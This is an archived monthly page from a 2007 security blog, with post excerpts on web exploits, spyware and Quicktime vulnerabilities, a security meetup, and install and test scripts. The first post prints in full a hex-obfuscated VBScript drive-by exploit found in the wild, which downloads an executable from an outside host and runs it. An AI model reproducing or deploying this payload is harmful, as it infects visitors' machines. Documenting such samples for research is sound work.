You are viewing a read-only archive of the Blogs.Harvard network. Learn more.
Skip to content

Monthly Archives: July 2007

web exploits using more sophisticated ciphers

Tuesday, July 31, 2007

found this one today: S=”6f6e206572726f7220726573756D65206E6578740d0a6375726C3D22687474703A2F2f78787476622e636E2F6172702f676F” S=S+”2e657865220D0A666e616D65313D22676F2e657865220D0a666E616d65323D22676F2e766273220D0A536574206466203D20″ S=S+”646f63756D656e742E637265617465456C656d656e7428226f626A65637422290D0a64662E73657441747472696275746520″ S=S+”22636c6173736964222C2022636C7369643A42443936433535362D363541332d313144302D393833412d3030433034464332″ S=S+”39453336220d0a7374723d224d6963726F736F66742E584d4C48545450220D0a5365742078203D2064662e4372656174654F” S=S+”626A656374287374722c2222290D0a43313d2241646f220d0a43323D2264622e220D0a43333d22737472220d0a43343D2265″ S=S+”616d220D0a737472313d43312643322643332643340d0a737472353D737472310D0a7365742053203d2064662e6372656174″ S=S+”656f626a65637428737472352c2222290d0a532e74797065203d20310D0A737472363D22474554220d0A782e4f70656e2073″ S=S+”7472362c206375726c2c2046616c73650D0a782E53656E640d0a73313D22536372697074220D0a73323D22696e672e220d0A” S=S+”73333d2246696c65220d0a73343D2253797374656D4f626a656374220d0a73303D73312b73322b73332b73340d0a73657420″ S=S+”46203D2064662e6372656174656F626a6563742873302c2222290D0a73657420746D70203D20462e4765745370656369616C” S=S+”466f6C6465722832290d0A666e616d65313d20462E4275696c645061746828746D702C666e616d6531290d0A532e6f70656e” S=S+”0d0a532e777269746520782E726573706F6E7365426f64790D0a532e73617665746F66696c6520666E616d65312c320D0a53″ S=S+”2E636C6f73650d0a666E616D65323D20462E4275696C645061746828746d702c666E616d6532290d0a536574207473203d20″ S=S+”462e4f70656e5465787446696c6528666e616d65322C20322c2054727565290D0a74732e57726974654c696E652022536574″ S=S+”205368656c6c203d204372656174654F626a656374282222577363726970742e5368656c6C222229220d0A73716c3D225368″ S=S+”656c6c2E52756e282222222B666e616d65312b22222229220d0A74732e57726974654C696e652073716C0D0a74732e577269″ S=S+”74654c696E652022736574205368656C6c3D4E6F7468696E67220d0A74732e636C6F73650D0A696620462E46696c65457869″ S=S+”73747328666E616D6531293D74727565207468656e0D0a696620462e46696c6545786973747328666E616d6532293d747275″ S=S+”65207468656e0d0A202020207368613D225368656c6c2e417070220d0a202020207368623d7368610d0a2020202073657420″ S=S+”51203D2064662e6372656174656f626a656374287368622B226C69636174696f6E222C2222290D0A20202020512e5368656C” S=S+”6C4578656375746520666e616d65322C22222c22222c226f70656E222C300D0a656e642069660D0a656E642069660D0A”

Filed in Digital Warfare | | Comments Off on web exploits using more sophisticated ciphers

Sending your IM logs to Tech Support

Tuesday, July 31, 2007

I ran into an awkward situation the other day while debugging an issue with my PDA synch software. I’m in a unique situation where I have an older Windows Mobile based PDA but I’m using a Powerbook for my main computing needs. The two don’t play so nicely together however certain software vendors like MarkSpace […]

Filed in spyware | | Comments Off on Sending your IM logs to Tech Support

Beansec turns 1!

Tuesday, July 17, 2007

This Wednesday will mark the 12th ever beansec! If you haven’t been to one yet or haven’t found time to attend then this is the month to make it. BeanSec! is an informal meetup of information security professionals, researchers and academics in the Greater Boston area that meets the third Wednesday of each month. Come […]

Filed in events, Non Sequiter, zeroday | | Comments Off on Beansec turns 1!

Rails install script for Ubuntu (feisty fawn)

Tuesday, July 17, 2007

echo “Credit to Urban Puddle for the guide” echo “this is the article in script form” echo “you can cut and paste this entire article into a shell script and run it.” sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install build-essential sudo apt-get install ruby ri rdoc mysql-server libmysql-ruby ruby1.8-dev irb1.8 libdbd-mysql-perl libdbi-perl libmysql-ruby1.8 […]

Filed in Interesting Tech | | Comments Off on Rails install script for Ubuntu (feisty fawn)

Simple Shell Script for Testing Badware

Thursday, July 12, 2007

day:~ zero$ cat fake_ie.sh curl -A “Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)” $1 | less

Filed in Digital Warfare, Non Sequiter | | Comments Off on Simple Shell Script for Testing Badware

New Critical Quicktime Vulnerabilities Out

Wednesday, July 11, 2007

Just received word that new vulnerabilities exist for Quicktime which can cause infection by simply browsing a website. Don’t let the mitigating circumstances fool you. With the huge number of websites break ins and subsequent iframe injections the chances of a site infecting you is significantly high. An attacker simply doesn’t need to “entice a […]

Filed in Digital Warfare | | Comments Off on New Critical Quicktime Vulnerabilities Out

MediaDefender caught in entrapment scheme

Saturday, July 7, 2007

MediaDefender is a long time “enforcement” agency of the MPAA. Recently they were caught setting up a fake online video site (think YouTube for pirated movies) and now claim the site was only an internal project and that they were the victims of libel. The site was taken down amid controversial blogging and coverage from […]

Filed in Digital Warfare, Rights Online, spyware | | Comments Off on MediaDefender caught in entrapment scheme

Targeting IE

Friday, July 6, 2007

An easy way to target Internet Explorer is to use VBScript as the exploit obfuscation mechanism. In this case an ancient form of encryption called the Windows Scripting Encoder. It was hoped to “protect” source code from prying eyes but as substitution ciphers go this one didn’t really help much. A decoder was written which […]

Filed in Digital Warfare | | Comments Off on Targeting IE
Proudly powered by WordPress. Hosted by Pressable.